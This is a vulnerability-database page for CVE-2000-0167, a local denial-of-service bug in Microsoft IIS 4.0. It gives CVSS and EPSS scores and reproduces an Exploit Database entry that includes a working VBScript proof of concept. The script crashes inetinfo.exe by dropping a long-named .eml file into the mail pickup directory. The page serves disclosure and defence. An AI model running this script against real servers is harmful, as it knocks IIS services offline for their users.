CVE-2000-0167 : Detail

CVE-2000-0167

0.05%V3
Local
2000-02-23
04h00 +00:00
2003-03-21
09h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

IIS Inetinfo.exe allows local users to cause a denial of service by creating a mail file with a long name and a .txt.eml extension in the pickup directory.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 2.1 AV:L/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 20310

Publication date : 2000-02-14 23h00 +00:00
Author : Valentijn
EDB Verified : Yes

source: https://www.securityfocus.com/bid/1819/info An email with a filename consisting of over 86 characters and an extension of .txt.eml will cause Microsoft IIS to crash if placed in the \mailroot\pickup directory. The process inetinfo.exe will crash, resulting in a Dr. Watson access violation error. Restarting IIS is required in order to regain normal functionality. ' PLEASE PROVIDE YOUR PICKUP PATH HERE Rootpath = "c:\inetpub\mailroot\pickup\" Set fso = createobject("scripting.filesystemobject") Thename = Createkey & fso.GetTempName & ".eml" Set Thefile = fso.GetFolder(rootpath).CreateTextFile(TheName) Thefile.writeline "X-Sender: [email protected]" Thefile.writeline "X-Receiver: [email protected]" Thefile.writeline "From: <[email protected]>" Thefile.writeline "To: <[email protected]>" Thefile.writeline "Subject: MINE DID NOT CRASH" Thefile.writeline "Date: " & now() Thefile.writeline "X-Generator: " & Thename Thefile.close Set thefile = nothing Thename = "" Function Createkey for z = 1 to 80 randomize a = Int((25 * Rnd) + 1) password = password & chr(a+65) next Createkey = password end function ' Warning IF InetInfo.exe crashes it cannot be started again as long as the file is still there! </example script>

Products Mentioned

Configuraton 0

Microsoft>>Internet_information_server >> Version 4.0

References